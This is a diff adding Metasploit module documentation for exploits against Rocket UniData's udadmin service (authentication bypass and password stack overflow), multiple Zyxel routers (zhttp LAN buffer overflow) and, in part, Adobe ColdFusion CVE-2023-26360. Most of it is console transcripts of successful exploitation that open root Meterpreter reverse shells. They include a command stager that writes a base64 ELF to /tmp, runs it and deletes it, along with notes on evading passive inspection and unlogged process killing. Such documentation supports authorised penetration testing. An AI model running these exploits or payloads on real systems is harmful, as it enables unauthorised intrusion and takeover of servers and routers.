+[-] Unknown datastore option: UNIDATA_VERSION.
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > show options
+
+Module options (exploit/linux/misc/unidata_udadmin_auth_bypass):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   RHOSTS           10.0.0.198       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT            31438            yes       The target port (TCP)
+   SSL              false            no        Negotiate SSL for incoming connections
+   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
+   UNIRPC_GID       1000             yes       gid to authenticate with (must not be 0, does not need to correspond to the username)
+   UNIRPC_UID       0                yes       Linux uid to authenticate with (must correspond to the username)
+   UNIRPC_USERNAME  root             yes       Linux username to authenticate with (must match the uid)
+   URIPATH                           no        The URI to use for this exploit (default is random)
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  ens160           yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] 10.0.0.198:31438 - Running automatic check ("set AutoCheck false" to disable)
+[*] 10.0.0.198:31438 - Trying to get version number from service defcs...
+[*] 10.0.0.198:31438 - Detected UniRPC version 8.2.4 is running
+[!] 10.0.0.198:31438 - The service is running, but could not be validated.
+[*] 10.0.0.198:31438 - Connecting to UniRPC endpoint udadmin
+[*] 10.0.0.198:31438 - Authenticating to RPC service as :local: / root:0:1000
+[*] 10.0.0.198:31438 - Sending OsCommand request
+[*] Sending stage (24772 bytes) to 10.0.0.198
+[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.198:54560) at 2023-04-11 09:36:56 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
+### Version 8.2.4 with invalid user
+
+```
+msf6 > use exploit/linux/misc/unidata_udadmin_auth_bypass
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set LHOST ens160
+LHOST => ens160
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set RHOST 10.0.0.198
+RHOST => 10.0.0.198
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set UNIDATA_VERSION 8.2.4
+[-] Unknown datastore option: UNIDATA_VERSION.
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set UNIRPC_USERNAME fake
+UNIRPC_USERNAME => fake
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > show options
+
+Module options (exploit/linux/misc/unidata_udadmin_auth_bypass):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   RHOSTS           10.0.0.198       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT            31438            yes       The target port (TCP)
+   SSL              false            no        Negotiate SSL for incoming connections
+   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
+   UNIRPC_GID       1000             yes       gid to authenticate with (must not be 0, does not need to correspond to the username)
+   UNIRPC_UID       0                yes       Linux uid to authenticate with (must correspond to the username)
+   UNIRPC_USERNAME  fake             yes       Linux username to authenticate with (must match the uid)
+   URIPATH                           no        The URI to use for this exploit (default is random)
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  ens160           yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] 10.0.0.198:31438 - Running automatic check ("set AutoCheck false" to disable)
+[*] 10.0.0.198:31438 - Trying to get version number from service defcs...
+[*] 10.0.0.198:31438 - Detected UniRPC version 8.2.4 is running
+[!] 10.0.0.198:31438 - The service is running, but could not be validated.
+[*] 10.0.0.198:31438 - Connecting to UniRPC endpoint udadmin
+[*] 10.0.0.198:31438 - Authenticating to RPC service as :local: / fake:0:1000
+[-] 10.0.0.198:31438 - Exploit aborted due to failure: unexpected-reply: UniRPC server returned something unexpected: UniRPC server returned an error code: Unknown error: 80011
+[*] Exploit completed, but no session was created.
+```
+
+### Version 8.2.4 with non-root user, unix command target
+
+```
+msf6 > use exploit/linux/misc/unidata_udadmin_auth_bypass
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set LHOST ens160
+LHOST => ens160
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set RHOST 10.0.0.198
+RHOST => 10.0.0.198
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set UNIDATA_VERSION 8.2.4
+[-] Unknown datastore option: UNIDATA_VERSION.
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set UNIRPC_USERNAME ron
+UNIRPC_USERNAME => ron
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set UNIRPC_UID 1000
+UNIRPC_UID => 1000
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] 10.0.0.198:31438 - Running automatic check ("set AutoCheck false" to disable)
+[*] 10.0.0.198:31438 - Trying to get version number from service defcs...
+[*] 10.0.0.198:31438 - Detected UniRPC version 8.2.4 is running
+[!] 10.0.0.198:31438 - The service is running, but could not be validated.
+[*] 10.0.0.198:31438 - Connecting to UniRPC endpoint udadmin
+[*] 10.0.0.198:31438 - Authenticating to RPC service as :local: / ron:1000:1000
+[*] 10.0.0.198:31438 - Sending OsCommand request
+[*] Sending stage (24772 bytes) to 10.0.0.198
+[*] Meterpreter session 2 opened (10.0.0.227:4444 -> 10.0.0.198:54562) at 2023-04-11 09:39:14 -0700
+
+meterpreter > getuid
+Server username: ron
+```
+
+### Version 8.2.4 as root, with unix dropper target
+
+```
+msf6 > use exploit/linux/misc/unidata_udadmin_auth_bypass
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Unix Command
+    1   Linux Dropper
+
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set LHOST ens160
+LHOST => ens160
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set RHOST 10.0.0.198
+RHOST => 10.0.0.198
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] 10.0.0.198:31438 - Running automatic check ("set AutoCheck false" to disable)
+[*] 10.0.0.198:31438 - Trying to get version number from service defcs...
+[*] 10.0.0.198:31438 - Detected UniRPC version 8.2.4 is running
+[!] 10.0.0.198:31438 - The service is running, but could not be validated.
+[*] 10.0.0.198:31438 - Connecting to UniRPC endpoint udadmin
+[*] 10.0.0.198:31438 - Authenticating to RPC service as :local: / root:0:1000
+[*] 10.0.0.198:31438 - Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAGgEAAAAAAAC8AQAAAAAAAAAQAAAAAAAAajlYDwVIhcB0CEgx/2o8WA8FBHAPBWo5WA8FSIXAdeox/2oJWJm2EEiJ1k0xyWoiQVpqB1oPBUiFwHhRagpBWVBqKViZagJfagFeDwVIhcB4O0iXSLkCABFcCgAA41FIieZqEFpqKlgPBVlIhcB5JUn/yXQYV2ojWGoAagVIiedIMfYPBVlZX0iFwHnHajxYagFfDwVean5aDwVIhcB47f/m>>'/tmp/AsOOd.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/eFHfW' < '/tmp/AsOOd.b64' ; chmod +x '/tmp/eFHfW' ; '/tmp/eFHfW' ; rm -f '/tmp/eFHfW' ; rm -f '/tmp/AsOOd.b64'"]
+[*] 10.0.0.198:31438 - Sending OsCommand request
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 10.0.0.198
+[*] 10.0.0.198:31438 - Command Stager progress - 100.00% done (863/863 bytes)
+[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.198:54564) at 2023-04-11 09:41:57 -0700
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,242 @@
+## Vulnerable Application
+
+Exploits a stack-based buffer overflow in `udadmin_server`, which is the
+administrator server for UniData (and possibly other services). It's accessed
+via the RPC service `unirpcd`.
+
+The username and password fields are both copied into a stack-based buffer
+using a `strcpy`-equivalent function, which has no bounds checking. As a result,
+we can write any amount of arbitrary data to the stack, including overwriting
+the return address. What's more - the `password` field is encoded by negating
+each byte, which means that despite being a `strcpy` overflow, NULL bytes are
+actually allowed (but 0xFF bytes are not)!
+
+For our exploit, we found a helpful gadget:
+
+```
+  412e25:       48 89 e7                mov    rdi, rsp
+  412e28:       e8 a3 56 ff ff          call   4084d0 <system@plt>
+```
+
+That will simply pass whatever happens to be on the stack to `system()`.
+
+The vulnerable application is `udadmin_server`, which is an RPC service that's
+run as part of `unirpcd`, which powers Rocket Software's UniData application
+(among others). The specific software is UniData 8.2.4.3001 for Linux, and
+because this is memory corruption, the sha256sums are:
+
+```
+  1cae78f2e190fe010b78f793fd98875295928af78e1e7eded5e9702ec08369ad  unirpcd
+  5186725bfd4a65b9ca82245702cf387fc5e6c4d4fa4edb9412a9ffebc7400e89  udadmin_server
+```
+
+The UniData software can be downloaded for free, but you have to request a demo
+copy and wait for an email to arrive. I can provide the installation files if
+needed.
+
+The software is distributed as a .zip file, which contains a .tar file:
+
+```
+  [ron@unidata unidata]$ unzip Unidata\ Personal\ X86_8.2.4.3001.zip
+  Archive:  Unidata Personal X86_8.2.4.3001.zip
+    inflating: bin.tar
+    inflating: UniData_Hotfix_V824_3001.pdf
+    inflating: UniData_Release_Notes_v824.pdf
+
+  [ron@unidata unidata]$ tar -xf bin.tar
+
+  [ron@unidata unidata]$ sudo ./udtsetup
+
+    [default options, set directories]
+
+    CheckLang            Yes
+    CheckPerms           No
+    Group                sys
+    InstallXDEMO         Yes
+    LibDir               /home/ron/unidata/unidata/lib
+    Startud              Yes
+    UdtBin               /home/ron/unidata/unidata/bin
+    UdtHome              /home/ron/unidata/unidata
+    UnisharedDir         /home/ron/unidata/unishared
+    WorkDir              /home/ron/unidata/unidata/work
+```
+
+I think it will automatically start the first time you install the software,
+but to run it after a reboot (note that this must be done as root):
+
+```
+  # export UDTBIN=/home/ron/unidata/unidata/bin
+  # export UDTHOME=/home/ron/unidata/unidata
+  # export PATH=$PATH:$UDTBIN
+  # export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$UDTBIN
+  # export LANG=C
+  # startud
+```
+
+(This module will not work at all against the Windows version)
+
+## Verification Steps
+
+1. Install the application (software and instructions are on Vulnerable Software drive)
+1. Start msfconsole
+1. Do: `use exploit/linux/misc/unidata_udadmin_password_stack_overflow`
+1. Do: set `RHOST`, `LHOST`, and payload if desired
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### `EXIT_CLEANLY`
+
+Because of how our ROP chain works, it's not possible to exit the application
+without crashing.
+
+However, we CAN kill the process with a clean signal when executing our payload,
+and that's what this option does. It prepends `kill -TERM $PPID &` to the
+shell payload, which kills the parent in a way that's not logged.
+
+The default is `true`.
+
+### `UNIRPC_ENDPOINT`
+
+The RPC endpoint to connect to. The default (`udadmin`) as well as `udadmin82`
+should work. It's unlikely anything else will work.
+
+### `UNIRPC_ENCODE_MESSAGES`
+
+A boolean, defined in the `unirpc.rb` mixin, that turns UniRPC's packet-body
+encoding on or off. Default is `true`.
+
+In the UniRPC header, there is a bit that enables packet encoding. If set, the
+packet body is XOR'd with either 1 or 2, depending on another header field.
+While it's not strong encoding by any means, it does hide the exploit from
+passive inspection. We set the encoding the XOR'ing with 2 by default.
+
+### `UNIDATA_VERSION`
+
+An enum, used to select the version for targeting.
+
+Currently, the only options are `8.2.4` and `auto`
+
+## Scenarios
+
+### Version 8.2.4 with auto-detection + unix command payload
+
+```
+msf6 > use exploit/linux/misc/unidata_udadmin_password_stack_overflow
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set LHOST ens160
+LHOST => ens160
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set RHOST 10.0.0.198
+RHOST => 10.0.0.198
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] 10.0.0.198:31438 - Running automatic check ("set AutoCheck false" to disable)
+[*] 10.0.0.198:31438 - Trying to get version number from service defcs...
+[*] 10.0.0.198:31438 - Detected UniRPC version 8.2.4 is running
+[!] 10.0.0.198:31438 - The service is running, but could not be validated.
+[*] 10.0.0.198:31438 - Using the version number from earlier for targeting: 8.2.4
+[*] 10.0.0.198:31438 - Connecting to UniRPC endpoint udadmin
+[*] 10.0.0.198:31438 - Authenticating to RPC service as qvvJpicOdkHUbWXb with a stack-overflowing password
+[*] 10.0.0.198:31438 - Payload sent
+[*] Sending stage (24772 bytes) to 10.0.0.198
+[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.198:54566) at 2023-04-11 09:44:21 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
+### Version 8.2.4 with specific targeting + unix command payload
+
+```
+msf6 > use exploit/linux/misc/unidata_udadmin_password_stack_overflow
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set LHOST ens160
+LHOST => ens160
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set RHOST 10.0.0.198
+RHOST => 10.0.0.198
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set UNIDATA_VERSION 8.2.4
+UNIDATA_VERSION => 8.2.4
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] 10.0.0.198:31438 - Running automatic check ("set AutoCheck false" to disable)
+[*] 10.0.0.198:31438 - Trying to get version number from service defcs...
+[*] 10.0.0.198:31438 - Detected UniRPC version 8.2.4 is running
+[!] 10.0.0.198:31438 - The service is running, but could not be validated.
+[*] 10.0.0.198:31438 - Using the version number from UNIDATA_VERSION for targeting: 8.2.4
+[*] 10.0.0.198:31438 - Connecting to UniRPC endpoint udadmin
+[*] 10.0.0.198:31438 - Authenticating to RPC service as iLlQgwIwNzxAxg with a stack-overflowing password
+[*] 10.0.0.198:31438 - Payload sent
+[*] Sending stage (24772 bytes) to 10.0.0.198
+[*] Meterpreter session 2 opened (10.0.0.227:4444 -> 10.0.0.198:54568) at 2023-04-11 09:46:03 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
+### Version 8.2.4 with auto-detection + unix dropper payload
+
+```
+msf6 > use exploit/linux/misc/unidata_udadmin_password_stack_overflow
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Unix Command
+    1   Linux Dropper
+
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set LHOST ens160
+LHOST => ens160
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set RHOST 10.0.0.198
+RHOST => 10.0.0.198
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/misc/unidata_udadmin_password_stack_overflow) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] 10.0.0.198:31438 - Running automatic check ("set AutoCheck false" to disable)
+[*] 10.0.0.198:31438 - Trying to get version number from service defcs...
+[*] 10.0.0.198:31438 - Detected UniRPC version 8.2.4 is running
+[!] 10.0.0.198:31438 - The service is running, but could not be validated.
+[*] 10.0.0.198:31438 - Using the version number from earlier for targeting: 8.2.4
+[*] 10.0.0.198:31438 - Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAGgEAAAAAAAC8AQAAAAAAAAAQAAAAAAAAajlYDwVIhcB0CEgx/2o8WA8FBHAPBWo5WA8FSIXAdeox/2oJWJm2EEiJ1k0xyWoiQVpqB1oPBUiFwHhRagpBWVBqKViZagJfagFeDwVIhcB4O0iXSLkCABFcCgAA41FIieZqEFpqKlgPBVlIhcB5JUn/yXQYV2ojWGoAagVIiedIMfYPBVlZX0iFwHnHajxYagFfDwVean5aDwVIhcB47f/m>>'/tmp/dlwwX.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/RiEPX' < '/tmp/dlwwX.b64' ; chmod +x '/tmp/RiEPX' ; '/tmp/RiEPX' ; rm -f '/tmp/RiEPX' ; rm -f '/tmp/dlwwX.b64'"]
+[*] 10.0.0.198:31438 - Connecting to UniRPC endpoint udadmin
+[*] 10.0.0.198:31438 - Authenticating to RPC service as fWPgXoZCdnEix with a stack-overflowing password
+[*] 10.0.0.198:31438 - Payload sent
+[*] 10.0.0.198:31438 - Command Stager progress - 100.00% done (863/863 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 10.0.0.198
+[*] Meterpreter session 3 opened (10.0.0.227:4444 -> 10.0.0.198:54570) at 2023-04-11 09:48:08 -0700
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,155 @@
+## Vulnerable Application
+
+This module exploits a buffer-overflow in multiple Zyxel devices. The vulnerabilitiy stems from missing string length
+checks. The vulnerability can only be exploited from the LAN side, but does not require authentication. As ASLR is
+activated, the libc address will be bruteforced. Thus the webserver will crash until successfull exploitation. On
+average this process takes 20 minutes.
+
+This vulnerability was discovered by Steffen Robertz, Gerhard Hechenberger, Stefan Viehboeck and Thomas Weber of the SEC
+Consult Vulnerability Lab in Vienna. The full writeup of all vulnerabilities is available here:
+[https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/]
+
+
+| Device       | Firmware  |
+| ------------ | --------- |
+| AMG1302-T11C | EOL       |
+| VMG3925-B10C | EOL       |
+| VMG8924-B10D | EOL       |
+| VMG1312-B10D | EOL       |
+| VMG3312-T20A | EOL       |
+| VMG3625-T20A | EOL       |
+| VMG3925-B10B | EOL       |
+| VMG3925-B10C | EOL       |
+| VMG3925-B30C | EOL       |
+| VMG3926-B10A | EOL       |
+| VMG5313-B10B | EOL       |
+| VMG5313-B30B | EOL       |
+| VMG8623-T50A | EOL       |
+| VMG8823-B10B | EOL       |
+| VMG8823-B30B | EOL       |
+| VMG8823-B50B | EOL       |
+| VMG8823-B60B | EOL       |
+| VMG8924-B10D | EOL       |
+| VMG8924-B30D | EOL       |
+| PMG5317-T20A | EOL       |
+| DX3301-T0 | V5.50(ABVY.3)C0 |
+| DX5401-B0 | V5.17(ABYO.1)C0 |
+| EMG3525-T50B | EMEA - V5.50(ABPM.6)C0 |
+| EMG3525-T50B | S. America - V5.50(ABSL.0)b12 |
+| EMG5523-T50B | EMEA - V5.50(ABPM.6)C0 |
+| EMG5523-T50B | S. America - V5.50(ABSL.0)b12 |
+| EMG5723-T50K | V5.50(ABOM.7)C0 |
+| EX3301-T0 | V5.50(ABVY.3)C0 |
+| EX5401-B0 | V5.17(ABYO.1)C0 |
+| EX5501-B0 | V5.17(ABRY.2)C0 |
+| LTE3301-PLUS | V1.00(ABQU.3)C0 |
+| LTE7240-M403 | V2.00(ABMG.4)C0 |
+| VMG1312-T20B | V5.50(ABSB.5)C0 |
+| VMG3625-T50B | V5.50(ABPM.6)C0 |
+| VMG3927-B50A | V5.17(ABMT.6)C0 |
+| VMG3927-B60A | V5.17(ABMT.6)C0 |
+| VMG3927-T50K | V5.50(ABOM.7)C0 |
+| VMG4005-B50A | V5.15(ABQA.2)C0 |
+| VMG8623-T50B | V5.50(ABPM.6)C0 |
+| VMG8825-B50A | V5.17(ABMT.6)C0 |
+| VMG8825-B50B | V5.17(ABNY.7)C0 |
+| VMG8825-B60A | V5.17(ABMT.6)C0 |
+| VMG8825-B60B | V5.17(ABNY.7)C0 |
+| VMG8825-T50K | V5.50(ABOM.7)C0 |
+| XMG3927-B50A | V5.17(ABMT.6)C0 |
+| XMG8825-B50A | V5.17(ABMT.6)C0 |
+| VPN2S | V1.20(ABLN.2)_00210319C1 |
+| AX7501-B0 | V5.17(ABPC.1)C0 |
+| EP240P | V5.40(ABVH.1)C0 |
+| PMG5317-T20B | V5.40(ABKI.4)C0 |
+| PMG5617GA | V5.40(ABNA.2)C0 |
+| PMG5622GA | V5.40(ABNB.2)C0 |
+| WX3100-T0 | V5.50(ABVL.1)C0 |
+| WX3401-B0 | V5.17(ABVE.1)C0 |
+| WSQ50 (Multy X) | V2.20(ABKJ.7)C0 |
+| WSQ60 (Multy Plus) | V2.20(ABND.8)C0 |
+
+## Verification Steps
+ Follow these steps to exploit the target:
+
+  1. Connect to a target on the LAN interface
+  2. Start msfconsole
+  3. Do: `use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce`
+  4. Set RHOST, LHOST and SRVHOST
+  5. Do `check`
+  6. Do: `run`
+  7. You should get a shell. On average this will take 20 minutes.
+## Options
+```
+Module options (exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+   
+
+Payload options (linux/armle/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+```
+
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce
+[*] Using configured payload linux/armle/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set LHOST XXX.XXX.XXX.XXX
+LHOST => XXX.XXX.XXX.XXX
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set RHOSTS XXX.XXX.XXX.XXX
+RHOSTS => XXX.XXX.XXX.XXX
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > check
+[+] XXX.XXX.XXX.XXX:80 - The target is vulnerable.
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set SRVHOST XXX.XXX.XXX.XXX
+SRVHOST => XXX.XXX.XXX.XXX
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > run
+
+[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
+[*] Attempting to exploit VMG3312-T20A <= EOL
+[*] Starting up our web service on XXX.XXX.XXX.XXX:8080 ...
+[*] Using URL: http://XXX.XXX.XXX.XXX:8080/o
+[*] Going to bruteforce ASLR, this will take a while...
+[*] Trying to overflow the buffer, attempt 1
+[*] Trying to overflow the buffer, attempt 2
+[*] Trying to overflow the buffer, attempt 3
+[*] Trying to overflow the buffer, attempt 4
+[*] Trying to overflow the buffer, attempt 5
+[*] Trying to overflow the buffer, attempt 6
+[*] Trying to overflow the buffer, attempt 7
+[*] Trying to overflow the buffer, attempt 8
+[*] Trying to overflow the buffer, attempt 9
+[*] Trying to overflow the buffer, attempt 10
+[...]
+[*] Trying to overflow the buffer, attempt 135
+[*] Trying to overflow the buffer, attempt 136
+[*] Trying to overflow the buffer, attempt 137
+[*] Trying to overflow the buffer, attempt 138
+[*] Trying to overflow the buffer, attempt 139
+[+] XXX.XXX.XXX.XXX:80 - Sending executable to the router
+[+] XXX.XXX.XXX.XXX:80 - A shell should connect soon!
+[*] Sending stage (908480 bytes) to XXX.XXX.XXX.XXX
+[*] Meterpreter session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:55253) at 2022-07-24 19:03:41 +0200
+[*] Server stopped.
+
+meterpreter > shell
+Process 9871 created.
+Channel 1 created.
+id
+uid=0(root) gid=0
+```
@@ -0,0 +1,244 @@
+## Vulnerable Application
+This module leverages an unauthenticated remote code execution vulnerability due to deserialization of untrusted data
+in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update
+15 and earlier. For a full technical analysis of the vulnerability read the
+[Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis).
+
+## Optionsgit st
+A default installation of ColdFusion will not require any of the below options to be configured as the default
+values will work.
+
+### CFC_ENDPOINT
+The exploit requires a valid ColdFusion Component (CFC) endpoint to be reachable, although no method on this endpoint
+will be called as the vulnerability is triggered before a remote method from the endpoint is called. Therefore this
+option can be set to any CFC endpoint. By default this is set to
+`/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc` which is present in a default installation
+of ColdFusion.
+
+### CF_LOGFILE
+This is the log file where the exploit will write arbitrary ColdFusion Markup Language (CFML) to. The path is relative
+to the `wwwroot` folder. By default this value is `../logs/coldfusion-out.log` and should not need to be changed.
+
+## Testing
+To setup a test environment, the following steps can be performed.
+1. Setup either a Windows Server 2022 VM or a Ubuntu 22.04 VM.
+2. Download either the [Windows ColdFusion 2021 Update 5
+installer](https://cfdownload.adobe.com/pub/adobe/coldfusion/2021/cfinstaller/cf2021u5/ColdFusion_2021_GUI_WWEJ_win64.exe)
+or the [Linux ColdFusion 2021 Update 5
+installer](https://cfdownload.adobe.com/pub/adobe/coldfusion/2021/cfinstaller/cf2021u5/ColdFusion_2021_GUI_WWEJ_linux64.bin)
+and install it.
+3. Configure the ColdFusion server for production use and enable the Secure Profile during setup.
